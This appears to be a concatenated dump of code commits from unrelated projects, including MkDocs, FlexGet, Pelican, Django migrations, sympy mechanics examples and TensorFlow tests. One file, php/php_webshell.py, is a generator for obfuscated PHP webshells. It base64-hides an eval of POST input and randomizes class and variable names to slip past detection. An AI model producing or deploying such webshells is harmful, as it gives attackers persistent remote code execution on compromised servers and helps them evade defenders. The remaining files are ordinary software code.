'--strict', is_flag=True, help=strict_help) @click.option('-d', '--site-dir', type=click.Path(), help=site_dir_help) @common_options def json_command(clean, config_file, strict, site_dir): """Build the MkDocs documentation to JSON files Rather than building your documentation to HTML pages, this outputs each page in a simple JSON format. This command is useful if you want to index your documentation in an external search engine. """ log.warning("The json command is deprcated and will be removed in a future " "MkDocs release. For details on updating: " "http://www.mkdocs.org/about/release-notes/") try: build.build(load_config( config_file=config_file, strict=strict, site_dir=site_dir ), dump_json=True, clean_site_dir=clean) except exceptions.ConfigurationError as e: # Avoid ugly, unhelpful traceback raise SystemExit('\n' + str(e)) @cli.command(name="gh-deploy") @click.option('-c', '--clean', is_flag=True, help=clean_help) @click.option('-f', '--config-file', type=click.File('rb'), help=config_file_help) @click.option('-m', '--message', help=commit_message_help) @click.option('-b', '--remote-branch', help=remote_branch_help) @click.option('-r', '--remote-name', help=remote_branch_help) @common_options def gh_deploy_command(config_file, clean, message, remote_branch, remote_name): """Deploy your documentation to GitHub Pages""" try: config = load_config( config_file=config_file, remote_branch=remote_branch, remote_name=remote_name ) build.build(config, clean_site_dir=clean) gh_deploy.gh_deploy(config, message=message) except exceptions.ConfigurationError as e: # Avoid ugly, unhelpful traceback raise SystemExit('\n' + str(e)) @cli.command(name="new") @click.argument("project_directory") @common_options def new_command(project_directory): """Create a new MkDocs project""" new.new(project_directory)
Python
0.000001
@@ -5332,16 +5332,17 @@ is depr +e cated an
00cc43b3e7a848c17272928f6469beb128e278b4
add linear_regression
projects/NLR_MEG/linear_regression.py
projects/NLR_MEG/linear_regression.py
Python
0.999885
@@ -0,0 +1,809 @@ +#!/usr/bin/env python2%0A# -*- coding: utf-8 -*-%0A%22%22%22%0ACreated on Tue Jun 26 12:08:31 2018%0A%0A@author: sjjoo%0A%22%22%22%0A#%25%25%0Aimport numpy as np%0Afrom sklearn import linear_model as lm%0Aimport statsmodels.api as sm%0A%0Aimport statsmodels.formula.api as smf%0Aimport pandas as pd%0A%0AX = np.column_stack((temp_read,temp_raw, temp_age,temp_meg1, temp_meg2))%0Ay = temp_meg2%0A%0Areg = lm.LinearRegression()%0Areg.fit(X,y)%0A%0A%0Ad = pd.DataFrame(X,columns=%5B'read', 'raw', 'age','meg_dot', 'meg_lex'%5D)%0Aresult1 = smf.ols('meg_dot~read',d).fit()%0Aresult2 = smf.ols('meg_dot~age',d).fit()%0A%0Aresult3 = smf.ols('meg_dot~read+age',d).fit()%0Aprint(result1.summary())%0Aprint(result2.summary())%0Aprint(result3.summary())%0A%0Aresult4 = smf.ols('meg_dot~meg_lex',d).fit()%0A%0Aprint(result4.summary())%0A%0Aresult5 = smf.ols('meg_dot~raw+age',d).fit()%0A%0Aprint(result5.summary())
f20aef828bb7e3a7206cd239ff95c3234391c11c
Add Example 5.1.
Kane1985/Chapter5/Example5.1.py
Kane1985/Chapter5/Example5.1.py
Python
0
@@ -0,0 +1,2087 @@ +#!/usr/bin/env python%0A# -*- coding: utf-8 -*-%0A%22%22%22Example 5.1 from Kane 1985.%22%22%22%0A%0Afrom __future__ import division%0Afrom sympy import Dummy, Matrix%0Afrom sympy import expand, solve, symbols, trigsimp%0Afrom sympy.physics.mechanics import ReferenceFrame, Point, dot, dynamicsymbols%0Afrom util import msprint, subs, partial_velocities%0Afrom util import generalized_active_forces, potential_energy%0A%0A%0Ag, m1, m2, k, L, omega, t = symbols('g m1 m2 k L %CF%89 t')%0Aq1, q2, q3 = dynamicsymbols('q1:4')%0Aqd1, qd2, qd3 = dynamicsymbols('q1:4', level=1)%0Au1, u2, u3 = dynamicsymbols('u1:4')%0A%0A## --- Define ReferenceFrames ---%0AA = ReferenceFrame('A')%0AB = A.orientnew('B', 'Axis', %5Bomega * t, A.y%5D)%0AE = B.orientnew('E', 'Axis', %5Bq3, B.z%5D)%0A%0A## --- Define Points and their velocities ---%0ApO = Point('O')%0ApO.set_vel(A, 0)%0A%0ApP1 = pO.locatenew('P1', q1*B.x + q2*B.y)%0ApD_star = pP1.locatenew('D*', L*E.x)%0A%0ApP1.set_vel(B, pP1.pos_from(pO).dt(B))%0ApD_star.v2pt_theory(pP1, B, E)%0A%0ApP1.v1pt_theory(pO, A, B)%0ApD_star.v2pt_theory(pP1, A, E)%0A%0A## --- Expressions for generalized speeds u1, u2, u3 ---%0Akde = %5Bu1 - dot(pP1.vel(A), E.x), u2 - dot(pP1.vel(A), E.y),%0A u3 - dot(E.ang_vel_in(B), E.z)%5D%0Akde_map = solve(kde, %5Bqd1, qd2, qd3%5D)%0A%0A## --- Velocity constraints ---%0Avc = %5Bdot(pD_star.vel(B), E.y)%5D%0Avc_map = solve(subs(vc, kde_map), %5Bu3%5D)%0A%0A## --- Define forces on each point in the system ---%0AK = k*E.x - k/L*dot(pP1.pos_from(pO), E.y)*E.y%0Agravity = lambda m: -m*g*A.y%0Aforces = %5B(pP1, K), (pP1, gravity(m1)), (pD_star, gravity(m2))%5D%0A%0A## --- Calculate generalized active forces ---%0Apartials = partial_velocities(zip(*forces)%5B0%5D, %5Bu1, u2%5D, A,%0A kde_map, vc_map)%0AFr_tilde, _ = generalized_active_forces(partials, forces)%0AFr_tilde = map(expand, map(trigsimp, Fr_tilde))%0A%0Aprint('Finding a potential energy function V.')%0AV = potential_energy(Fr_tilde, %5Bq1, q2, q3%5D, %5Bu1, u2%5D, kde_map, vc_map)%0Aif V is not None:%0A print('V = %7B0%7D'.format(msprint(V)))%0A print('Substituting %CE%B1i = 0, C = 0...')%0A zero_vars = dict(zip(symbols('C %CE%B11:4'), %5B0%5D * 4))%0A print('V = %7B0%7D'.format(msprint(V.subs(zero_vars))))%0A
bc691d415d32836f8354582294c6ae11413b0a6a
change version to .dev
flexget/_version.py
flexget/_version.py
""" Current FlexGet version. This is contained in a separate file so that it can be easily read by setup.py, and easily edited and committed by release scripts in continuous integration. Should (almost) never be set manually. The version should always be set to the <next release version>.dev The jenkins release job will automatically strip the .dev for release, and update the version again for continued development. """ __version__ = '2.0.0'
Python
0.000001
@@ -438,10 +438,14 @@ = '2.0.0 +.dev '%0A
9012cb2aa34d6df32e780555b74581b29cd309b8
add forgotten new module
flexx/ui/_iframe.py
flexx/ui/_iframe.py
Python
0
@@ -0,0 +1,800 @@ +from .. import react%0Afrom . import Widget%0A%0A %0Aclass IFrame(Widget):%0A %22%22%22 An iframe element, i.e. a container to show web-content. Note%0A that some websites do not allow themselves to be rendered in a%0A cross-source iframe.%0A %22%22%22%0A %0A CSS = '.flx-iframe %7Bborder: none;%7D'%0A %0A @react.input%0A def url(v=''):%0A %22%22%22 The url to show. 'http://' is automatically prepended if the url%0A does not have '://' in it.%0A %22%22%22%0A v = str(v)%0A if v and not '://' in v:%0A v = 'http://' + v%0A return v%0A %0A class JS:%0A %0A def _create_node(self):%0A self.node = document.createElement('iframe')%0A %0A @react.connect('url')%0A def _update_url(self, url):%0A print('set', url)%0A self.node.src = url%0A
76c7add3a57810d42e6584ddf22acc027f641a0a
Create classes.py
classes.py
classes.py
Python
0.000001
@@ -0,0 +1,551 @@ +from tkinter import *%0A%0Aclass myClass:%0A%0A def hello(self):%0A self.label.config(text='HelloO!')%0A%0A def __init__(self,master): # this function is always called when object is instantiated%0A frame=Frame(master)%0A frame.pack()%0A%0A self.printBtn = Button(frame, text='click', command=self.hello)%0A self.printBtn.pack()%0A self.quitBtn = Button(frame, text='quit', command=frame.quit)%0A self.quitBtn.pack()%0A self.label = Label(frame)%0A self.label.pack()%0A%0A%0Aroot= Tk()%0Ac= myClass(root)%0A%0Aroot.mainloop()%0A
2ccefe090305e815633f92a6f3d13155e46e7711
Update migrations
app/timetables/migrations/0002_auto_20171005_2209.py
app/timetables/migrations/0002_auto_20171005_2209.py
Python
0.000001
@@ -0,0 +1,2082 @@ +# -*- coding: utf-8 -*-%0A# Generated by Django 1.11 on 2017-10-05 22:09%0Afrom __future__ import unicode_literals%0A%0Aimport django.core.validators%0Afrom django.db import migrations, models%0A%0A%0Aclass Migration(migrations.Migration):%0A%0A dependencies = %5B%0A ('timetables', '0001_initial'),%0A %5D%0A%0A operations = %5B%0A migrations.AlterField(%0A model_name='course',%0A name='name',%0A field=models.CharField(help_text='Example: appetizer, main course, dessert', max_length=150),%0A ),%0A migrations.AlterField(%0A model_name='course',%0A name='sequence_order',%0A field=models.PositiveSmallIntegerField(help_text='The numerical order of the dishes for a meal option. E.g, 1 for appetizer, 2 for main course', unique=True),%0A ),%0A migrations.AlterField(%0A model_name='timetable',%0A name='cycle_length',%0A field=models.PositiveSmallIntegerField(help_text='Number of days in which the menu timetable is repeated after a period of time. E.g, A cycle length of 14 days (2 weeks) including the inactive weekdays like weekends after which the food schedule is repeated.', validators=%5Bdjango.core.validators.MinValueValidator(1)%5D),%0A ),%0A migrations.AlterField(%0A model_name='timetable',%0A name='ref_cycle_date',%0A field=models.DateField(help_text='The reference date in time with which cycle day for any other following date can be computed. E.g, 1 if today is Sunday as first day of the cycle length. No need to always update this except the cycle changes.'),%0A ),%0A migrations.AlterField(%0A model_name='timetable',%0A name='ref_cycle_day',%0A field=models.PositiveSmallIntegerField(help_text='The reference day (numerical value) in time with which cycle day for any other following date can be computed. E.g, 1 if today is Sunday as first day of the cycle length. No need to always update this except the cycle changes.', validators=%5Bdjango.core.validators.MinValueValidator(1)%5D),%0A ),%0A %5D%0A
7f2f0dca532ce3cbcf33720e56a639f78b82e771
add console utility
multivac/console.py
multivac/console.py
Python
0.000001
@@ -0,0 +1,2341 @@ +import sys%0Afrom termcolor import colored%0A%0Afrom multivac.version import version%0Afrom multivac.models import JobsDB%0Afrom multivac.util import format_time%0A%0Aclass Console(object):%0A def __init__(self):%0A self.prompt = colored('multivac%3E ','cyan',attrs=%5B'bold'%5D) %0A self.db = JobsDB('localhost', 6379)%0A%0A self.commands = %7B 'jobs' : self.jobs, %0A 'logs' : self.logs, %0A 'actions' : self.actions,%0A 'exit' : self.exit %7D%0A %0A self.run()%0A%0A def run(self):%0A print('Multivac version %25s' %25 (version)) %0A while True:%0A cmdline = input(self.prompt).split(' ')%0A cmd = cmdline.pop(0)%0A args = ' '.join(cmdline)%0A%0A if cmd not in self.commands:%0A print('invalid command: %25s' %25 (cmd))%0A else:%0A if args:%0A self.commands%5Bcmd%5D(args)%0A else:%0A self.commands%5Bcmd%5D()%0A%0A def jobs(self):%0A jobs = self.db.get_jobs()%0A for j in jobs:%0A created = format_time(j%5B'created'%5D)%0A%0A if j%5B'status'%5D == 'completed':%0A status = colored(j%5B'status'%5D, 'green')%0A elif j%5B'status'%5D == 'pending':%0A status = colored(j%5B'status'%5D, 'yellow')%0A else:%0A status = j%5B'status'%5D%0A%0A print('%25s %25s(%25s) %25s' %25 (created, j%5B'id'%5D, j%5B'name'%5D, status))%0A%0A def logs(self, job_id):%0A jobs = self.db.get_jobs()%0A if job_id not in %5B j%5B'id'%5D for j in jobs %5D:%0A print(colored('no such job: %25s' %25 job_id, 'red'))%0A return%0A%0A print('%5Cn'.join(self.db._get_stored_log(job_id)))%0A%0A%0A def actions(self):%0A actions = self.db.get_actions()%0A%0A output = %5B %5B'Name','Command','Confirm Required'%5D %5D%0A%0A for a in actions:%0A name = colored(a%5B'name'%5D, 'white', attrs=%5B'bold'%5D)%0A output.append(%5Ba%5B'name'%5D, a%5B'cmd'%5D, a%5B'confirm_required'%5D%5D)%0A%0A self._print_column(output)%0A%0A def exit(self):%0A sys.exit(0)%0A%0A def _print_column(self, data, has_header=True):%0A col_width = max(len(word) for row in data for word in row) + 2%0A for row in data:%0A print(''.join(word.ljust(col_width) for word in row))%0A%0Aif __name__ == '__main__':%0A c = Console()%0A
f4202292570eb51e52629ad09280175b42598d52
Add Divider class
murasame/divider.py
murasame/divider.py
Python
0.000001
@@ -0,0 +1,1127 @@ +import os%0A%0Aimport pandas as pd%0A%0Afrom . import CONFIG%0A%0Aconf = CONFIG%5B%22divider%22%5D%0A%0A%0Aclass Divider(object):%0A def __init__(self, df, files, base):%0A self.data = df%0A self.files = files%0A self.base = base%0A self.writers = %7B%7D%0A%0A def _setup_writer(self, outdir):%0A assert self.files%0A os.makedirs(outdir, exist_ok=True)%0A%0A for name in self.files.keys():%0A path = os.path.join(outdir, name)%0A self.writers%5Bname%5D = pd.ExcelWriter(path)%0A%0A def save(self, outdir):%0A self._setup_writer(outdir)%0A%0A for classname, member in self.data.groupby(self.base):%0A member = member.drop(self.base, axis=1)%0A for filename, classnames in self.files.items():%0A if classname in classnames:%0A target = self.writers%5Bfilename%5D%0A break%0A else:%0A raise RuntimeError%0A%0A member.to_excel(target, classname, index=False)%0A%0A for w in self.writers.values():%0A w.save()%0A%0A%0Adef divider(df):%0A div = Divider(df, conf%5B%22files%22%5D, conf%5B%22base%22%5D)%0A div.save(conf%5B%22out%22%5D)%0A
d03a412e5be455a85ad0a4b624c71bbc30fb1ffb
add a sleep to the autoreload loop since we dont need too high cpu load
pelican/__init__.py
pelican/__init__.py
import argparse import os from pelican.generators import (ArticlesGenerator, PagesGenerator, StaticGenerator, PdfGenerator) from pelican.settings import read_settings from pelican.utils import clean_output_dir, files_changed from pelican.writers import Writer from pelican import log VERSION = "2.6.0" class Pelican(object): def __init__(self, settings=None, path=None, theme=None, output_path=None, markup=None, keep=False): """Read the settings, and performs some checks on the environment before doing anything else. """ self.path = path or settings['PATH'] if not self.path: raise Exception('you need to specify a path containing the content' ' (see pelican --help for more information)') if self.path.endswith('/'): self.path = path[:-1] # define the default settings self.settings = settings self.theme = theme or settings['THEME'] output_path = output_path or settings['OUTPUT_PATH'] self.output_path = os.path.realpath(output_path) self.markup = markup or settings['MARKUP'] self.keep = keep or settings['KEEP_OUTPUT_DIRECTORY'] # find the theme in pelican.theme if the given one does not exists if not os.path.exists(self.theme): theme_path = os.sep.join([os.path.dirname( os.path.abspath(__file__)), "themes/%s" % self.theme]) if os.path.exists(theme_path): self.theme = theme_path else: raise Exception("Impossible to find the theme %s" % theme) def run(self): """Run the generators and return""" context = self.settings.copy() generators = [ cls( context, self.settings, self.path, self.theme, self.output_path, self.markup, self.keep ) for cls in self.get_generator_classes() ] for p in generators: if hasattr(p, 'generate_context'): p.generate_context() # erase the directory if it is not the source if os.path.realpath(self.path).startswith(self.output_path) and not self.keep: clean_output_dir(self.output_path) writer = self.get_writer() for p in generators: if hasattr(p, 'generate_output'): p.generate_output(writer) def get_generator_classes(self): generators = [ArticlesGenerator, PagesGenerator, StaticGenerator] if self.settings['PDF_GENERATOR']: generators.append(PdfGenerator) return generators def get_writer(self): return Writer(self.output_path, settings=self.settings) def main(): parser = argparse.ArgumentParser(description="""A tool to generate a static blog, with restructured text input files.""") parser.add_argument(dest='path', nargs='?', help='Path where to find the content files') parser.add_argument('-t', '--theme-path', dest='theme', help='Path where to find the theme templates. If not specified, it' 'will use the default one included with pelican.') parser.add_argument('-o', '--output', dest='output', help='Where to output the generated files. If not specified, a directory' ' will be created, named "output" in the current path.') parser.add_argument('-m', '--markup', default=None, dest='markup', help='the list of markup language to use (rst or md). Please indicate ' 'them separated by commas') parser.add_argument('-s', '--settings', dest='settings', help='the settings of the application. Default to None.') parser.add_argument('-k', '--keep-output-directory', dest='keep', action='store_true', help='Keep the output directory and just update all the generated files.' 'Default is to delete the output directory.') parser.add_argument('-v', '--verbose', action='store_const', const=log.INFO, dest='verbosity', help='Show all messages') parser.add_argument('-q', '--quiet', action='store_const', const=log.CRITICAL, dest='verbosity', help='Show only critical errors') parser.add_argument('-D', '--debug', action='store_const', const=log.DEBUG, dest='verbosity', help='Show all message, including debug messages') parser.add_argument('--version', action='version', version=VERSION, help='Print the pelican version and exit') parser.add_argument('-r', '--autoreload', dest='autoreload', action='store_true', help="Relaunch pelican each time a modification occurs on the content" "files") args = parser.parse_args() log.init(args.verbosity) # Split the markup languages only if some have been given. Otherwise, populate # the variable with None. markup = [a.strip().lower() for a in args.markup.split(',')] if args.markup else None if args.settings is None: settings = {} settings = read_settings(args.settings) cls = settings.get('PELICAN_CLASS') if isinstance(cls, basestring): module, cls_name = cls.rsplit('.', 1) module = __import__(module) cls = getattr(module, cls_name) try: pelican = cls(settings, args.path, args.theme, args.output, markup, args.keep) if args.autoreload: while True: try: if files_changed(pelican.path, pelican.markup): pelican.run() except KeyboardInterrupt: break else: pelican.run() except Exception, e: log.critical(str(e)) if __name__ == '__main__': main()
Python
0
@@ -18,16 +18,28 @@ mport os +%0Aimport time %0A%0Afrom p @@ -5713,16 +5713,74 @@ break%0A + time.sleep(.5) # sleep to avoid cpu load%0A
7d987220474d76286c49b5378861854a09798a16
create project folder
PowerOutagePredictor/Tree/_init_.py
PowerOutagePredictor/Tree/_init_.py
Python
0.000001
@@ -0,0 +1 @@ +%0A
43d9582172cb268f9c2f38f3cd211bbca06b0741
Create php_webshell.py
php/php_webshell.py
php/php_webshell.py
Python
0
@@ -0,0 +1,1082 @@ +import random%0A%0A#author: pureqh%0A#github: https://github.com/pureqh/webshell%0A%0A%0Ashell = '''%3C?php %0Aclass %7B0%7D%7B3%7D%0A public $%7B1%7D = null;%0A public $%7B2%7D = null;%0A public $%7B6%7D = null;%0A function __construct()%7B3%7D%0A $this-%3E%7B1%7D = 'ZXZhbCgkX1BPU';%0A $this-%3E%7B6%7D = '1RbYV0pOw==';%0A $this-%3E%7B2%7D = @base64_decode($this-%3E%7B1%7D.$this-%3E%7B6%7D);%0A @eval(%7B5%7D.$this-%3E%7B2%7D.%7B5%7D);%0A %7B4%7D%7B4%7D%0Anew %7B0%7D();%0A?%3E'''%0A%0A%0Adef random_keys(len):%0A str = '%60~-=!@#$%25%5E&_+?%3C%3E%7C:%5B%5DabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'%0A return ''.join(random.sample(str,len))%0A%0Adef random_name(len):%0A str = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'%0A return ''.join(random.sample(str,len)) %0A %0Adef build_webshell():%0A className = random_name(4)%0A parameter1 = random_name(5)%0A parameter2 = random_name(6)%0A lef = '''%7B'''%0A rig = '''%7D'''%0A disrupt = %22%5C%22/*%22+random_keys(7)+%22*/%5C%22%22%0A parameter3 = random_name(6)%0A shellc = shell.format(className,parameter1,parameter2,lef,rig,disrupt,parameter3)%0A return shellc%0A%0A%0Aif __name__ == '__main__':%0A print (build_webshell())%0A
87b597fd5363ca14a8e491ba84bedb4486c6676b
Test __bytes__ special method
python3/jute/test/test_jute_bytes.py
python3/jute/test/test_jute_bytes.py
Python
0.000469
@@ -0,0 +1,2307 @@ +import unittest%0A%0Afrom jute import Interface, Dynamic%0A%0A%0Aclass BytesLike(Interface):%0A%0A def __iter__(self):%0A %22%22%22bytes-like object must be iterable.%22%22%22%0A%0A def __bytes__(self):%0A %22%22%22Return bytes representation.%22%22%22%0A%0A%0Aclass BytesTestMixin:%0A%0A def get_test_object(self):%0A return object()%0A%0A def test_bytes(self):%0A bytes_like = self.get_test_object()%0A self.assertEqual(bytes(bytes_like), b'foo')%0A%0A def test_getattr(self):%0A bytes_like = self.get_test_object()%0A self.assertEqual(getattr(bytes_like, '__bytes__')(), b'foo')%0A%0A def test_attribute(self):%0A bytes_like = self.get_test_object()%0A self.assertEqual(bytes_like.__bytes__(), b'foo')%0A%0A%0Aclass FooBytes(BytesLike.Provider):%0A%0A def __iter__(self):%0A return iter(b'foo')%0A%0A def __bytes__(self):%0A return b'foo'%0A%0A%0Aclass BytesInstanceTests(BytesTestMixin, unittest.TestCase):%0A%0A def get_test_object(self):%0A return FooBytes()%0A%0A%0Aclass BytesInterfaceTests(BytesTestMixin, unittest.TestCase):%0A%0A def get_test_object(self):%0A return BytesLike(FooBytes())%0A%0A%0Aclass FooBytesProxy(Dynamic.Provider):%0A%0A def provides_interface(self, interface):%0A return interface.implemented_by(BytesLike)%0A%0A def __iter__(self):%0A return iter(b'foo')%0A%0A def __bytes__(self):%0A return b'foo'%0A%0A%0Aclass BytesDynamicInstanceTests(BytesTestMixin, unittest.TestCase):%0A%0A def get_test_object(self):%0A return FooBytesProxy()%0A%0A%0Aclass BytesDynamicInterfaceTests(BytesTestMixin, unittest.TestCase):%0A%0A def get_test_object(self):%0A return BytesLike(FooBytesProxy())%0A%0A%0A# __bytes__ is never optimised away, so generated version works as is%0A%0Aclass GeneratedBytes(BytesLike.Provider):%0A%0A %22%22%22A class that generates the __bytes__ method dynamically.%22%22%22%0A%0A def __iter__(self):%0A return iter(b'foo')%0A%0A def __getattr__(self, name):%0A if name == '__bytes__':%0A def f():%0A return b'foo'%0A return f%0A raise AttributeError(name)%0A%0A%0Aclass GeneratedBytesInstanceTests(BytesTestMixin, unittest.TestCase):%0A%0A def get_test_object(self):%0A return GeneratedBytes()%0A%0A%0Aclass GeneratedBytesInterfaceTests(BytesTestMixin, unittest.TestCase):%0A%0A def get_test_object(self):%0A return BytesLike(GeneratedBytes())%0A
0b20df518e66e3763a05ca796880c96d8e1d291d
compute covariance of multiple objects
cov_obs.py
cov_obs.py
Python
0.99999
@@ -0,0 +1,2103 @@ +import numpy as np%0Aimport matplotlib.pyplot as plt%0A%0Afrom astropy import constants as c, units as u, table as t%0Afrom astropy.io import fits%0Afrom astropy import coordinates as coords%0A%0Aimport os%0A%0Aimport spec_tools%0Aimport ssp_lib%0Aimport manga_tools as m%0A%0Afrom itertools import izip, product%0Afrom glob import glob%0A%0Adef extract_duplicate_spectra(lllim, lulim):%0A '''%0A for a single object, extract duplicate spectra in the correct%0A wavelength range, and output into two stacked arrays (flux and ivar)%0A '''%0A%0Adef compute_cov(objs_fs, objs_ivars, dest='cov_obs.fits'):%0A '''%0A given a list of spectra, grouped by object, find the spectral covariance%0A '''%0A%0A # for each object (group of spectra), subtract the mean spectrum%0A # (mean is weighted by ivar + eps)%0A%0A objs_normed = %5Bf - np.average(f, weights=i, axis=0) for f in obj_fs%5D%0A objs_normed = np.row_stack(objs_normed)%0A%0A objs_ivars = np.row_stack(objs_ivars)%0A # and take the (weighted) covariance of the residual%0A%0A # this loop is bad and I should feel bad%0A covar = np.empty((objs_fs%5B0%5D.shape%5B1%5D, ) * 2)%0A for j, k in product(range(covar.shape%5B0%5D), range(covar.shape%5B1%5D)):%0A covar%5Bj, k%5D = np.average(%0A (objs_normed%5B:, j%5D * objs_normed%5B:, k%5D),%0A weights=(objs_ivars%5B:, j%5D*objs_ivars%5B:, k%5D))%0A%0A hdulist = %5Bfits.PrimaryHDU(covar)%5D%0A hdulist = fits.HDUList(hdulist)%0A hdulist.writeto(dest)%0A%0A return covar%0A%0Adef find_BOSS_duplicates():%0A '''%0A using spAll file, find objIDs that have multiple observations, and%0A the associated %5Bplate/mjd/fiberid%5D combinations%0A '''%0A # read in file that contains all BOSS observation coordinates%0A obs_t = t.Table.read()%0A%0A # objectIDs for all %22primary objects%22%0A prim = obs_t%5Bobs_t%5B'specprimary'%5D%5D%5B'objid'%5D%0A%0A collated = %7B%7D%0A for p in prim:%0A obj = obs_t%5Bobs_t%5B'objid'%5D == p%5D%0A # when there's only one observation, we don't care!%0A if len(obj) %3C= 1:%0A continue%0A%0A # when there's more than one, output %5Bplate, mjd, fiber%5D to dict%0A collated%5Bp%5D = %5Br%5B'plate', 'mjd', 'fiberid'%5D r in obj%5D%0A
5e398ae0d8074a3caf11997884d9f719ef047b15
Define exception for incorrect arguments
soccer/exceptions.py
soccer/exceptions.py
Python
0.005016
@@ -0,0 +1,52 @@ +class IncorrectParametersException(Exception):%0A%09pass
d7020ccb328747922942c56872bcfbec47d451ae
Add cli command class for delete
quilt/cli/delete.py
quilt/cli/delete.py
Python
0
@@ -0,0 +1,2828 @@ +# vim: fileencoding=utf-8 et sw=4 ts=4 tw=80:%0A%0A# python-quilt - A Python implementation of the quilt patch system%0A#%0A# Copyright (C) 2012 Bj%C3%B6rn Ricks %3Cbjoern.ricks@googlemail.com%3E%0A#%0A# This library is free software; you can redistribute it and/or%0A# modify it under the terms of the GNU Lesser General Public%0A# License as published by the Free Software Foundation; either%0A# version 2.1 of the License, or (at your option) any later version.%0A%0A# This library is distributed in the hope that it will be useful,%0A# but WITHOUT ANY WARRANTY; without even the implied warranty of%0A# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU%0A# Lesser General Public License for more details.%0A%0A# You should have received a copy of the GNU Lesser General Public%0A# License along with this library; if not, write to the Free Software%0A# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA%0A# 02110-1301 USA%0A%0Afrom quilt.cli.meta import Command%0Afrom quilt.delete import Delete%0A%0Aclass DeleteCommand(Command):%0A%0A usage = %22%25prog delete %5B-r%5D %5B--backup%5D %5Bpatch%7C-n%5D%22%0A name = %22delete%22%0A%0A def add_args(self, parser):%0A parser.add_option(%22-r%22, help=%22Remove the deleted patch file from the %22 %5C%0A %22patches directory as well.%22,%0A action=%22store_true%22, dest=%22remove%22, default=False)%0A parser.add_option(%22-n%22, help=%22Delete the next patch after topmost, %22 %5C%0A %22rather than the specified or topmost %22 %5C%0A %22patch.%22,%0A action=%22store_true%22, dest=%22next%22)%0A parser.add_option(%22--backup%22, help=%22Rename the patch file to patch~ %22 %5C%0A %22rather than deleting it. Ignored if %22 %5C%0A %22not used with %60-r'.%22,%0A action=%22store_true%22, default=False, dest=%22backup%22)%0A%0A def run(self, options, args):%0A delete = Delete(self.get_cwd(), self.get_pc_dir(),%0A self.get_patches_dir())%0A delete.deleted_patch.connect(self.deleted_patch)%0A delete.deleting_patch.connect(self.deleting_patch)%0A%0A if options.next and len(args) %3E 0:%0A parser.print_usage()%0A sys.exit(1)%0A%0A if options.next:%0A delete.delete_next(options.remove, options.remove)%0A else:%0A patch = None%0A if len(args) %3E 0:%0A patch = args%5B0%5D%0A%0A delete.delete_patch(patch, options.remove, options.remove)%0A%0A def deleted_patch(self, patch):%0A print %22Removed patch %25s%22 %25 patch.get_name()%0A%0A def deleting_patch(self, patch, applied):%0A if applied:%0A print %22Removing currently applied patch %25s%22 %25 patch.get_name()%0A else:%0A print %22Removing patch %25s%22 %25 patch.get_name()%0A
8dfd59a639bcf540ea4c5a52e91c5f8a7a198554
Initialize affineKeyTest
books/CrackingCodesWithPython/Chapter14/affineKeyTest.py
books/CrackingCodesWithPython/Chapter14/affineKeyTest.py
Python
0.000001
@@ -0,0 +1,400 @@ +# This program proves that the keyspace of the affine cipher is limited%0A# to less than len(SYMBOLS) %5E 2.%0A%0Aimport affineCipher, cryptomath%0A%0Amessage = 'Make things as simple as possible, but not simpler.'%0Afor keyA in range(2, 80):%0A key = keyA * len(affineCipher.SYMBOLS) + 1%0A%0A if cryptomath.gcd(keyA, len(affineCipher.SYMBOLS)) == 1:%0A print(keyA, affineCipher.encryptMessage(key, message))
b8e36b1a6f8563645413595f8f51aae8c0a91a69
Switch PrefetchWithSlackTest to use TF combinations
tensorflow/python/data/experimental/kernel_tests/prefetch_with_slack_test.py
tensorflow/python/data/experimental/kernel_tests/prefetch_with_slack_test.py
# Copyright 2019 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """Tests for `experimental_slack` option.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function from absl.testing import parameterized from tensorflow.core.protobuf import config_pb2 from tensorflow.python.data.kernel_tests import test_base from tensorflow.python.data.ops import dataset_ops from tensorflow.python.data.ops import multi_device_iterator_ops from tensorflow.python.framework import errors from tensorflow.python.framework import ops from tensorflow.python.framework import test_util from tensorflow.python.platform import test @test_util.run_all_in_graph_and_eager_modes class PrefetchWithSlackTest(test_base.DatasetTestBase, parameterized.TestCase): @test_util.run_v1_only("b/121264236") def testPrefetchWithSlackOption(self): """Determines slack_period based on num devices attached to iterator.""" dataset = dataset_ops.Dataset.range(10) dataset = dataset.prefetch(1) options = dataset_ops.Options() options.experimental_slack = True dataset = dataset.with_options(options) multi_device_iterator = multi_device_iterator_ops.MultiDeviceIterator( dataset, ["/cpu:1", "/cpu:2"]) dataset = multi_device_iterator._dataset # pylint: disable=protected-access self.assertIn("slack", dataset.options()._static_optimizations()) self.assertIn("slack:slack_period:2", dataset.options()._static_optimization_configs()) config = config_pb2.ConfigProto(device_count={"CPU": 3}) with self.test_session(config=config): self.evaluate(multi_device_iterator.initializer) for i in range(0, 10, 2): elem_on_1, elem_on_2 = multi_device_iterator.get_next() self.assertEqual(i, self.evaluate(elem_on_1)) self.assertEqual(i + 1, self.evaluate(elem_on_2)) with self.assertRaises(errors.OutOfRangeError): elem_on_1, elem_on_2 = multi_device_iterator.get_next() self.evaluate(elem_on_1) self.evaluate(elem_on_2) def testPrefetchWithSlackOptionWithoutIterator(self): """Defaults to slack period of 1 without iterator.""" dataset = dataset_ops.Dataset.range(10) dataset = dataset.prefetch(1) options = dataset_ops.Options() options.experimental_slack = True dataset = dataset.with_options(options) self.assertIn("slack", dataset.options()._static_optimizations()) self.assertIn("slack:slack_period:1", dataset.options()._static_optimization_configs()) self.assertDatasetProduces(dataset, range(10)) def testWithPassthroughDataset(self): """Should still work with a passthrough dataset after prefetch().""" dataset = dataset_ops.Dataset.range(10) dataset = dataset.prefetch(1) dataset = dataset.map(lambda x: x + 1) options = dataset_ops.Options() options.experimental_slack = True dataset = dataset.with_options(options) self.assertDatasetProduces(dataset, range(1, 11)) def testErrorWithoutPrefetch(self): """The rewrite fails if there is no prefetch() in the pipeline.""" dataset = dataset_ops.Dataset.range(10) options = dataset_ops.Options() options.experimental_slack = True dataset = dataset.with_options(options) with 